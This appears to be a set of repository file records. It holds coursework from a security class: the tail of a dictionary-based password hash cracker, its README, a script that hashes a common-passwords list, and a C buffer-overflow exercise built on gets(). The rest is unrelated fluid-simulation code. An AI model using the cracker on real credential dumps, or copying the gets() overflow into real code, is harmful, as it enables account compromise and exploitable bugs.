+ ':' + ruleFourDictionary4[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary5[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary5[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary6[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary6[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try: \n print(colored(hashedPassword + ':' + ruleFourDictionary7_0[hashedPassword],'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_0[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_1[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_1[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_2[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_2[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_3[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_3[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_4[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_4[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_5[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_5[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_6[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_6[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_7[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_7[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_8[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_8[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary7_9[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary7_9[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFiveDictionary[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleFiveDictionary[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n print(colored('Hash not found . . . ' + hashedPassword, 'red'))\n \nmain()\n"
},
{
"alpha_fraction": 0.7377049326896667,
"alphanum_fraction": 0.7632058262825012,
"avg_line_length": 90.43333435058594,
"blob_id": "722cc755a7ff373fb4978f4736a56fa1585785e6",
"content_id": "8a4234a02f060624d4761fa82fee177622059eb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2745,
"license_type": "no_license",
"max_line_length": 662,
"num_lines": 30,
"path": "/Clever_McCabe_HW1/README.md",
"repo_name": "pmccabe5/CSCI345",
"src_encoding": "UTF-8",
"text": "# CSCI345 HW 1\n## Running the program\n#### Written by: Clare Clever and Patrick McCabe\n#### In order for maximum viewing experience, using VSCode's README preview function or another Markdown Viewer\n## How to run HW1\n1. Make sure python3 is installed in your environment.\n2. Open a terminal and navigate to the folder containing `Clever_McCabe_HW1_passwd_cracking.py`\n3. Run the following commands in a terminal:\n * `pip3 install termcolor`\n * `python3 Clever_McCabe_HW1_passwd_cracking.py`\n\n## Test Cases\nWe initially used 18 test cases, three for each rule along with a mix of other types of hashesto test. We then pulled the top 10,000 passwords from [Daniel Miessler's xato-net-10-million-passwords-10000](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/xato-net-10-million-passwords-10000.txt) list and was hashed to the specified format for input into the program: `username:hash[:otherstuff]`. These tests were then combined with our original test cases to create our full test suite. Included are our hash creation script for testing, `hash.py`, as well as the plain text of Daniel Miessler's top 10,000 list, `Daniel-Miessler-Top10000.txt`. \n## Input and Output\nThe input file is called `passwordDump.txt` (formatted to username:encryption[:otherstuff]) with one input per line, any additional test cases can be inserted into the file for further testing. We have included the default wordlist for Unix as `words.txt` for platform compatibility. \nThe output file is `cracked-passwords-Clever-McCabe.txt`\n\n## Performance\n* Potential password hashes are loaded into a hash table at the beginning of the program. This is the most expensive part of our program due to the time it takes to generate the hashes \nthat satisfy all the rules, as well as the memory needed to load the hashes into memory.\n* The overall runtime of the program is improved upon by using the included threadding library included in python to mulithread the generation of the hashes at runtime.\n* Comparison of the hash that is input into the program is almost instataneous, due to the hash table allowing for instant access of the records with the hash as the key\n* **Note: This program benefits from newer hardware such as multithreadded processors and more available RAM. We conducted our tests on a desktop with a quad core Intel i5 4th generation processor with 8GB of double data rate (DDR) DDR3 RAM, a MacBook Pro with a dual core Intel i5 chip and 16GB of DDR3 RAM, and a AMD Ryzen 2700x with 4 cores, 8 CPU threads, and 12GB of DDR4 RAM**\n* **`(JOKE) Hardware Specifications:`**\n\n| Hardware | Minimum | Optimal |\n|:----------:|:---------:|:---------:|\n|CPU | 4x Core | 6+ Cores|\n|RAM|8 GB |32+ GB|\n|GPU | Integrated Graphics | Nvidia RTX 2080 |\n\n\n"
},
{
"alpha_fraction": 0.6629629731178284,
"alphanum_fraction": 0.6777777671813965,
"avg_line_length": 18.35714340209961,
"blob_id": "98f0bb1e3008753e5d57c80e4b1f4e56c34d54c2",
"content_id": "d639d6be5db960ffe3a07750aa247d8f5f250e3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 270,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 14,
"path": "/HW4/bo1.c",
"repo_name": "pmccabe5/CSCI345",
"src_encoding": "UTF-8",
"text": "#include <stdlib.h>\n#include <unistd.h>\n#include <stdio.h>\nint main(int argc, char **argv)\n{\nvolatile int modified;\nchar buffer[64];\nmodified = 0;\ngets(buffer);\nif(modified != 0) {printf(\"you have changed the 'modified' variable\\n\");\n} else {\nprintf(\"Try again?\\n\");\n}\n}"
},
{
"alpha_fraction": 0.5690608024597168,
"alphanum_fraction": 0.5966851115226746,
"avg_line_length": 23.200000762939453,
"blob_id": "7fd733767ec64e8b7fcfe41e391b1df90f746523",
"content_id": "c82f5edcb335eb7a52cc27afe1479eb70e719b41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 362,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 15,
"path": "/Clever_McCabe_HW1/hash.py",
"repo_name": "pmccabe5/CSCI345",
"src_encoding": "UTF-8",
"text": "import hashlib\n\nwordlist = open('DanielMiessler-Top10000.txt', 'r')\n\noutfile = open('outFile.txt', 'w')\ni = 0\n\nfor line in wordlist:\n fulltext = line.strip('\\n')\n hashed = hashlib.sha256()\n hashed.update(fulltext.encode())\n hashed = hashed.hexdigest()\n outfile.write(\"Test\" + str(i) + \":\" + hashed + \":\" + str(i) + \"\\n\")\n print(i)\n i = i + 1"
},
{
"alpha_fraction": 0.755892276763916,
"alphanum_fraction": 0.7760942578315735,
"avg_line_length": 53,
"blob_id": "190e1b34c721b2b58c9643049746eb3a7fac2af1",
"content_id": "22f6d534aa8f43260318ea3c3b131a86b90c764f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 594,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 11,
"path": "/README.md",
"repo_name": "pmccabe5/CSCI345",
"src_encoding": "UTF-8",
"text": "# CSCI345\n## Running the program\n**How to run HW1**\n1. Make sure Python3 is installed in your environment.\n2. Open a terminal and navigate to the folder containing `Clever_McCabe_HW1_passwd_cracking.py`\n3. Run the following commands in the terminal:\n * pip3 install termcolor\n * python3 Clever_McCabe_HW1_passwd_cracking.py\n## Input and Output\nThe input file is `passwordDump.txt` (formatted to username:encryption[:otherstuff]) with one input per line, any additional test cases can be inserted into the file for further testing.\nThe output file is `cracked-passwords-Clever-McCabe.txt`\n"
}
] | 5 |
ryanrabello/power-analyzer-backend | https://github.com/ryanrabello/power-analyzer-backend | b319dc3a2a906d7a701215a9be5e1c628d19289d | 0cc2b17da1de3b79d1fb1a843ea027f1afbbb0a8 | 208f9d15211d2c33c0b3fe34e586f953052190a9 | refs/heads/master | 2022-01-02T08:06:38.725581 | 2018-02-05T22:58:54 | 2018-02-05T22:58:54 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6900368928909302,
"alphanum_fraction": 0.7011070251464844,
"avg_line_length": 26.100000381469727,
"blob_id": "c193f72ddc354791a528175ebcab36496ab00aee",
"content_id": "1220dcd77b43c37131ec2f9b484574bdc879ee0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 10,
"path": "/datapoints/tests.py",
"repo_name": "ryanrabello/power-analyzer-backend",
"src_encoding": "UTF-8",
"text": "from django.test import TestCase, Client\nfrom django.urls import reverse\n\n\nclass GenericTest(TestCase):\n\n def test_did_compile(self):\n client = Client()\n response = client.get(reverse('datapoints:index'))\n self.assertIs(response.status_code, 200)\n"
},
{
"alpha_fraction": 0.822429895401001,
"alphanum_fraction": 0.822429895401001,
"avg_line_length": 25.75,
"blob_id": "71ba39f440a2ff1ef127bfb25ff39e8ee0011470",
"content_id": "c3b8618097bbf406a280fe9ab99c953b5a499ed7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 214,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 8,
"path": "/datapoints/admin.py",
"repo_name": "ryanrabello/power-analyzer-backend",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\nfrom .models import Building, Device, Circuit, Measurement\n\nadmin.site.register(Building)\nadmin.site.register(Device)\nadmin.site.register(Circuit)\nadmin.site.register(Measurement)\n"
},
{
"alpha_fraction": 0.6705461144447327,
"alphanum_fraction": 0.6920322179794312,
"avg_line_length": 27.64102554321289,
"blob_id": "32c7f2a981ccc876b1d08f589329c07d9ca0e6e9",
"content_id": "6978e8db03c8c2410ee3be38754f73e990ef05f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1117,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 39,
"path": "/datapoints/models.py",
"repo_name": "ryanrabello/power-analyzer-backend",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\nclass Building(models.Model):\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=1000)\n\n def __str__(self):\n return self.name\n\n\nclass Device(models.Model):\n building = models.ForeignKey(Building, on_delete=models.CASCADE)\n name = models.CharField(max_length=200)\n location = models.CharField(max_length=200)\n description = models.CharField(max_length=1000)\n\n def __str__(self):\n return self.name\n\n\nclass Circuit(models.Model):\n device = models.ForeignKey(Device, on_delete=models.CASCADE)\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=1000)\n\n def __str__(self):\n return self.name\n\n\nclass Measurement(models.Model):\n Circuit = models.ForeignKey(Circuit, on_delete=models.CASCADE)\n # Note: If we choose to allow the device to set the time of measurement\n # this will have to be changed to a value that can be set.\n time = models.DateTimeField(auto_now_add=True)\n power = models.FloatField()\n\n def __str__(self):\n return str(self.time)\n"
}
] | 3 |
karmaisgreat/Adb-Network-Type-Detector | https://github.com/karmaisgreat/Adb-Network-Type-Detector | 9064cb988b760462004836d6d5eb53f80eec3ed5 | c2a89824654852d44768c102d5e28214b9e4bd07 | a1ca9a8e760e0ed3a70abf40c9833c087c4c2391 | refs/heads/master | 2020-12-08T05:30:27.366467 | 2020-01-09T20:35:40 | 2020-01-09T20:35:40 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7840909361839294,
"alphanum_fraction": 0.7840909361839294,
"avg_line_length": 28.33333396911621,
"blob_id": "0e068e8633e286a666c52ae52759ba2727a4f963",
"content_id": "a510da0283d8b3837408e06b0fde3a2e127fff18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 88,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 3,
"path": "/README.md",
"repo_name": "karmaisgreat/Adb-Network-Type-Detector",
"src_encoding": "UTF-8",
"text": "# adb-network-type-detector\n\nPreferred Network Type Detector build for adb in python...\n"
},
{
"alpha_fraction": 0.5742574334144592,
"alphanum_fraction": 0.5884631872177124,
"avg_line_length": 40.5,
"blob_id": "78e773c24afde950f65e667ff2ea9c3e5d737101",
"content_id": "1feccd450163c33b7d2c896f60cee488873bc31b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2323,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 56,
"path": "/network_detection.py",
"repo_name": "karmaisgreat/Adb-Network-Type-Detector",
"src_encoding": "UTF-8",
"text": "import os,platform,time\ndetected_os = platform.system()\nif 'Windows' in detected_os:\n print('\\nWindows OS Detected!\\n')\n while True:\n cmd0 = \"platform-tools_r29.0.5-windows\\\\adb.exe shell dumpsys telephony.registry > logging.txt\"\n os.system(cmd0)\n fin = open('logging.txt', \"r\")\n data_list = fin.readlines()\n fin.close()\n fout = open(\"logging.txt\", \"w\")\n fout.writelines(data_list[:5])\n fout.close()\n if 'mRilDataRadioTechnology=2(EDGE)' in open('logging.txt').read():\n print('EDGE DETECTED!')\n elif 'mRilDataRadioTechnology=3(UMTS)' in open('logging.txt').read():\n print('UMTS DETECTED!')\n elif 'mRilDataRadioTechnology=9(HSDPA)' in open('logging.txt').read():\n print('HSDPA DETECTED!')\n elif 'mRilDataRadioTechnology=11(HSPA)' in open('logging.txt').read():\n print('HSPA DETECTED!')\n elif 'mRilDataRadioTechnology=15(HSPAP)' in open('logging.txt').read():\n print('HSPAP DETECTED!')\n elif 'mRilDataRadioTechnology=14(LTE)' in open('logging.txt').read():\n print('LTE DETECTED!')\n else:\n print('UNKNOWN NETWORK!')\n time.sleep(2)\n \nelif 'Linux' in detected_os:\n print('\\nLinux OS Detected!\\n')\n while True:\n cmd0 = \"platform-tools_r29.0.5-linux\\\\adb dumpsys telephony.registry > logging.txt\"\n os.system(cmd0)\n fin = open('logging.txt', \"r\")\n data_list = fin.readlines()\n fin.close()\n fout = open(\"logging.txt\", \"w\")\n fout.writelines(data_list[:5])\n fout.close()\n if 'mRilDataRadioTechnology=2(EDGE)' in open('logging.txt').read():\n print('EDGE DETECTED!')\n elif 'mRilDataRadioTechnology=3(UMTS)' in open('logging.txt').read():\n print('UMTS DETECTED!')\n elif 'mRilDataRadioTechnology=11(HSPA)' in open('logging.txt').read():\n print('HSPA DETECTED!')\n elif 'mRilDataRadioTechnology=15(HSPAP)' in open('logging.txt').read():\n print('HSPAP DETECTED!')\n elif 'mRilDataRadioTechnology=14(LTE)' in open('logging.txt').read():\n print('LTE DETECTED!')\n else:\n print('UNKNOWN NETWORK!')\n time.sleep(2)\nelse:\n print('\\nUnknown OS Detected!\\n')\n exit()"
}
] | 2 |
bpatmiller/gfm2d | https://github.com/bpatmiller/gfm2d | 04e2c4985b959acf3070ba1d6e86ebeee0a10854 | 5495150b94ca91e0a88817c9ffc1e78e7b159b3b | d02288382d8edf693a665f559fbe709970f1b272 | refs/heads/master | 2020-07-04T18:23:23.994721 | 2019-08-27T06:10:29 | 2019-08-27T06:10:29 | 202,371,355 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5247285962104797,
"alphanum_fraction": 0.5934861302375793,
"avg_line_length": 39.1129035949707,
"blob_id": "34fe3009b3dcccdebe00057b93a7e1084e8098db",
"content_id": "30bbfec94564ab161996b20210b1a3e9d18081d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2487,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 62,
"path": "/lib/calculus.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"velocityfield.hpp\"\nusing namespace glm;\n\n/** Note: this is intended for use with only integer indices */\nvec2 upwind_gradient(Array2f &phi, vec2 velocity, vec2 ij) {\n if (ij.x < 1.0 || ij.x > phi.sx - 2.0 || ij.y < 0 || ij.y > phi.sy - 2.0)\n return vec2(0);\n float dx = velocity.x > 0 ? phi(ij) - phi(ij - vec2(1, 0))\n : phi(ij + vec2(1, 0)) - phi(ij);\n float dy = velocity.y > 0 ? phi(ij) - phi(ij - vec2(0, 1))\n : phi(ij + vec2(0, 1)) - phi(ij);\n return vec2(dx, dy) / phi.h;\n}\n\n/** \"Classic\" 4th order Runge-Kutta integration */\nvec2 rk4(vec2 position, VelocityField &vel, float dt) {\n float l1 = vel(position).x * dt;\n float l2 = dt * vel(vec2(position.x + 0.5f * l1, position.y + 0.5f * dt)).x;\n float l3 = dt * vel(vec2(position.x + 0.5f * l2, position.y + 0.5f * dt)).x;\n float l4 = dt * vel(vec2(position.x + l3, position.y * dt)).x;\n float x = position.x + (1.f / 6.f) * (l1 + 2.f * l2 + 2.f * l3 + l4);\n\n float k1 = vel(position).y * dt;\n float k2 = dt * vel(vec2(position.x + 0.5f * dt, position.y + 0.5f * k1)).y;\n float k3 = dt * vel(vec2(position.x + 0.5f * dt, position.y + 0.5f * k2)).y;\n float k4 = dt * vel(vec2(position.x * dt, position.y + k3)).y;\n float y = position.y + (1.f / 6.f) * (k1 + 2.f * k2 + 2.f * k3 + k4);\n\n return vec2(x, y);\n}\n\n/** Forward euler integration, only for testing purposes */\nvec2 forward_euler(vec2 position, VelocityField &vel, float dt) {\n return position + (vel(position) * dt);\n}\n\n/** returns the central difference gradient of a point on a grid */\nvec2 gradient(Array2f &field, vec2 ij) {\n float dx = field(ij + vec2(1, 0)) - field(ij - vec2(1, 0));\n float dy = field(ij + vec2(0, 1)) - field(ij - vec2(0, 1));\n return vec2(dx, dy) / (2.0f * field.h);\n}\n\nvec2 bilerp(vec2 v00, vec2 v10, vec2 v01, vec2 v11, vec2 xy) {\n return ((1.0f - xy.x) * v00 + xy.x * v10) * (1.0f - xy.y) +\n ((1.0f - xy.x) * v01 + xy.x * v11) * (xy.y);\n}\n\n/** returns the interpolated central differenced gradient of a point in\n * worldspace */\nvec2 interpolate_gradient(Array2f &field, vec2 world_position) {\n vec2 ij = field.coordinates_at(world_position);\n vec2 xy = field.subcell_coordinates(ij);\n\n vec2 g00 = gradient(field, ivec2(ij));\n vec2 g10 = gradient(field, ivec2(ij) + ivec2(1, 0));\n vec2 g01 = gradient(field, ivec2(ij) + ivec2(0, 1));\n vec2 g11 = gradient(field, ivec2(ij) + ivec2(1, 1));\n\n return bilerp(g00, g10, g01, g11, xy);\n}\n"
},
{
"alpha_fraction": 0.4955357015132904,
"alphanum_fraction": 0.7098214030265808,
"avg_line_length": 43.79999923706055,
"blob_id": "1e5225953609c1c5eabd8ca8c7a9fb89273e8ff7",
"content_id": "224dc8458fb20e84499a38d8020931511b0a83f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 224,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 5,
"path": "/docs/search/functions_3.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['ij_5ffrom_5findex',['ij_from_index',['../structArray2.html#a2b28a251ffb9195059a7ec0f2f5dc799',1,'Array2']]],\n ['init',['init',['../structArray2.html#ad6a742ce7bd22f8f56b3959a26f28c11',1,'Array2']]]\n];\n"
},
{
"alpha_fraction": 0.5290697813034058,
"alphanum_fraction": 0.729651153087616,
"avg_line_length": 85,
"blob_id": "7e9155fca7487b401092b9c0901abd88fe4d5187",
"content_id": "550afe8692477efd5be76015443c84acaf207e9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 344,
"license_type": "no_license",
"max_line_length": 322,
"num_lines": 4,
"path": "/docs/search/functions_4.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['operator_28_29',['operator()',['../structArray2.html#ac73bd1d6e74fade6085e8fccdfda8d7f',1,'Array2::operator()(int i)'],['../structArray2.html#a8a89f0623dc0e116e4dc14b0b77b769e',1,'Array2::operator()(int i, int j)'],['../structArray2.html#ab491a0168c532b6670233dec0e7a45d9',1,'Array2::operator()(glm::vec2 const ij)']]]\n];\n"
},
{
"alpha_fraction": 0.5726119875907898,
"alphanum_fraction": 0.5890775322914124,
"avg_line_length": 31.377483367919922,
"blob_id": "d75e48ef74ac2ec577829fe08af5cbb410815df0",
"content_id": "fec5da11260d2ca086b81a39aacbb85aa088a938",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 9778,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 302,
"path": "/lib/simulation.cpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#include \"simulation.hpp\"\n#include \"export_data.hpp\"\n#include \"levelset_methods.hpp\"\n#include \"particle_levelset_method.hpp\"\n#include <eigen3/Eigen/IterativeLinearSolvers>\n#include <eigen3/Eigen/SparseCore>\n\n/** Returns a timestep that ensures the simulation is stable */\nfloat Simulation::cfl() {\n float reciprocal = (u.infnorm() + v.infnorm()) / h;\n return 1.0 / reciprocal;\n}\n\n/** Runs the main simulation loop. Exports simulation data at each timestep,\n * and breaks the timestep into substeps based on the CFL condition\n * time_elapsed - current runtime of the simulation\n * max_t - total amount of time the simulation will run\n * timestep - amount of time between \"frames\"\n * t - tracks the amount of time traversed in a given frame\n * substep - a length of time given by cfl() */\nvoid Simulation::run() {\n auto start_time = std::chrono::high_resolution_clock::now();\n // delete old datafiles, fix after initializing\n clear_exported_data();\n for (auto &f : fluids) {\n reinitialize_phi(f);\n }\n project_phi(fluids, solid_phi, vec4(-1, -1, -1, 0.0));\n // advance(std::min(cfl(), 1e-7f));\n print_information();\n auto end_time = std::chrono::high_resolution_clock::now();\n auto duration = std::chrono::duration_cast<std::chrono::milliseconds>(\n end_time - start_time);\n float ms = duration.count();\n printf(\"[ %.2fs elapsed ] \", ms / 1000.f);\n export_simulation_data(p, vel, fluids, time_elapsed, frame_number);\n while (time_elapsed < max_t) {\n frame_number += 1;\n if (time_elapsed + timestep > max_t)\n timestep = max_t - time_elapsed;\n // break the timestep up\n float t = 0;\n while (t < timestep) {\n float substep = cfl();\n if (t + substep > timestep)\n substep = timestep - t;\n advance(substep);\n t += substep;\n /* progress bar code */\n std::cout << \" \";\n int pos = 20 * (t / timestep);\n for (int b = 0; b < 20; ++b) {\n if (b < pos)\n std::cout << \".\";\n else if (b == pos)\n std::cout << \">\";\n else\n std::cout << \" \";\n }\n std::cout << \" \" << int((t / timestep) * 100.f) << \"%\\r\";\n std::cout.flush();\n /* ^ consider refactoring this */\n }\n std::cout << \"\\r\";\n std::cout.flush();\n end_time = std::chrono::high_resolution_clock::now();\n duration = std::chrono::duration_cast<std::chrono::milliseconds>(\n end_time - start_time);\n ms = duration.count();\n time_elapsed += timestep;\n printf(\"[ %3.2fs elapsed ] \", ms / 1000.f);\n export_simulation_data(p, vel, fluids, time_elapsed, frame_number);\n }\n for (auto f : fluids) {\n f.print_information();\n }\n}\n\n/* The central method in the Simulation class. This performs all of our\n * computations for a given timestep that it assumed to be safe. */\nvoid Simulation::advance(float dt) {\n assert(dt > 0);\n for (auto &f : fluids) {\n advect_phi(u, v, f.phi, dt);\n advect_particles(f, vel, solid_phi, dt);\n correct_levelset(f);\n reinitialize_phi(f);\n correct_levelset(f);\n adjust_particle_radii(f);\n if (reseed_counter++ % 5 == 0)\n reseed_particles(f, solid_phi);\n }\n project_phi(fluids, solid_phi, rxn);\n\n advect_velocity(dt);\n add_gravity(dt);\n\n // float max_velocity = 200.f;\n // u.clamp(-max_velocity, max_velocity);\n // v.clamp(-max_velocity, max_velocity);\n enforce_boundaries();\n solve_pressure(dt);\n apply_pressure_gradient(dt);\n}\n\nvoid Simulation::get_fluid_ids() {\n Array2f min_phi(sx, sy, -0.5, -0.5, h);\n min_phi.set(99999.9);\n\n for (uint n = 0; n < fluids.size(); n++) {\n auto &f = fluids[n];\n for (auto it = fluid_id.begin(); it != fluid_id.end(); it++) {\n vec2 ij = it.ij();\n if (f.phi(ij) < min_phi(ij)) {\n min_phi(ij) = f.phi(ij);\n fluid_id(ij) = n;\n }\n }\n }\n}\n\nvoid Simulation::add_gravity(float dt) {\n for (auto &face : v.data) {\n face -= 9.8 * dt;\n }\n}\n\nvoid Simulation::advect_velocity(float dt) {\n Array2f new_u(u);\n Array2f new_v(v);\n\n for (auto it = new_u.begin(); it != new_u.end(); it++) {\n vec2 new_position = rk4(it.wp(), vel, -dt);\n *it = u.value_at(new_position);\n }\n\n for (auto it = new_v.begin(); it != new_v.end(); it++) {\n vec2 new_position = rk4(it.wp(), vel, -dt);\n *it = v.value_at(new_position);\n }\n\n u = new_u;\n v = new_v;\n}\n\n/** Sets the velocity on solid boundaries to 0 so that fluids do not flow in or\n * out of solids */\nvoid Simulation::enforce_boundaries() {\n for (auto it = solid_phi.begin(); it != solid_phi.end(); it++) {\n if (*it < 0) {\n vec2 ij = it.ij();\n for (auto &f : fluids) {\n f.phi(ij) = min(f.phi(ij), 0.5f * f.phi.h);\n }\n u(ij) = 0;\n u(ij + vec2(1, 0)) = 0;\n v(ij) = 0;\n v(ij + vec2(0, 1)) = 0;\n }\n }\n}\n\n/* Returns an int array which gives each fluid cell a corresponding nonnegative\n * integer index. Nonfluid cells are marked with a -1 */\nArray2i Simulation::count_fluid_cells() {\n Array2i fluid_cell_count(sx, sy, -0.5, -0.5, h);\n fluid_cell_count.set(-1);\n int counter = 0;\n for (int i = 0; i < fluid_cell_count.size(); i++) {\n if (solid_phi(i) <= 0)\n continue;\n fluid_cell_count(i) = counter++;\n }\n assert(counter > 0);\n return fluid_cell_count;\n}\n\n/** Returns the density between two voxels, either as naively expected in the\n * case where the voxels contain the same fluid, or as defined in eqn. 55 in Liu\n * et al*/\nfloat Simulation::sample_density(vec2 ij, vec2 kl) {\n if (fluid_id(ij) == fluid_id(kl)) {\n return 1.f / fluids[fluid_id(ij)].density;\n } else {\n int ij_id = fluid_id(ij);\n int kl_id = fluid_id(kl);\n float ij_phi = fluids[ij_id].phi(ij);\n float kl_phi = fluids[kl_id].phi(kl);\n float b_minus = 1.f / fluids[ij_id].density;\n float b_plus = 1.f / fluids[kl_id].density;\n float theta = abs(ij_phi) / (abs(ij_phi) + abs(kl_phi));\n return (b_minus * b_plus) / (theta * b_plus + (1.f - theta) * b_minus);\n }\n}\n\n/** Assembles a varying coefficient matrix for the possion equation. The lhs is\n * discretized as in eqn. 77 in liu et all */\nEigen::SparseMatrix<double>\nSimulation::assemble_poisson_coefficient_matrix(Array2i fluid_cell_count,\n int nf) {\n std::vector<Eigen::Triplet<double>> coefficients;\n for (int it = 0; it < p.size(); it++) {\n if (solid_phi(it) <= 0)\n continue;\n vec2 ij = p.ij_from_index(it);\n float scale = 1.f / (h * h);\n int center_index = fluid_cell_count(ij);\n float center_coefficient = 0;\n\n /* loop through all four neighboring cells */\n for (auto offset : {vec2(1, 0), vec2(-1, 0), vec2(0, 1), vec2(0, -1)}) {\n vec2 neighbor_position = ij + offset;\n int neighbor_index = fluid_cell_count(neighbor_position);\n if (neighbor_index >= 0) {\n float b_hat = sample_density(ij, neighbor_position);\n float neighbor_coefficient = scale * b_hat;\n center_coefficient -= scale * b_hat;\n coefficients.push_back(Eigen::Triplet<double>(\n center_index, neighbor_index, neighbor_coefficient));\n }\n }\n coefficients.push_back(\n Eigen::Triplet<double>(center_index, center_index, center_coefficient));\n }\n\n Eigen::SparseMatrix<double> A(nf, nf);\n A.setFromTriplets(coefficients.begin(), coefficients.end());\n return A;\n}\n\n/** Sets up a linear system Ax=b to solve the discrete poission equation with\n * varying coefficients.\n */\nvoid Simulation::solve_pressure(float dt) {\n /* Count each fluid cell, and find which voxels contain which fluids */\n get_fluid_ids();\n Array2i fluid_cell_count = count_fluid_cells();\n int nf = fluid_cell_count.max() + 1; // number of fluid cells\n\n /* Compute the discrete divergence of each fluid cell */\n Eigen::VectorXd rhs(nf);\n for (int i = 0; i < solid_phi.size(); i++) {\n if (solid_phi(i) <= 0)\n continue;\n vec2 ij = solid_phi.ij_from_index(i);\n rhs(fluid_cell_count(i)) = (1.f / (h * dt)) * (u(ij + vec2(1, 0)) - u(ij) +\n v(ij + vec2(0, 1)) - v(ij));\n }\n\n /* Assemble the coefficient matrix */\n Eigen::SparseMatrix<double> A =\n assemble_poisson_coefficient_matrix(fluid_cell_count, nf);\n\n /* Copy old pressure to a vector, to use as a guess */\n // Eigen::VectorXd old_pressures(nf);\n // for (int i = 0; i < p.size(); i++) {\n // if (fluid_cell_count(i) < 0)\n // continue;\n // old_pressures(fluid_cell_count(i)) = p(i);\n // }\n\n /* Solve the linear system with 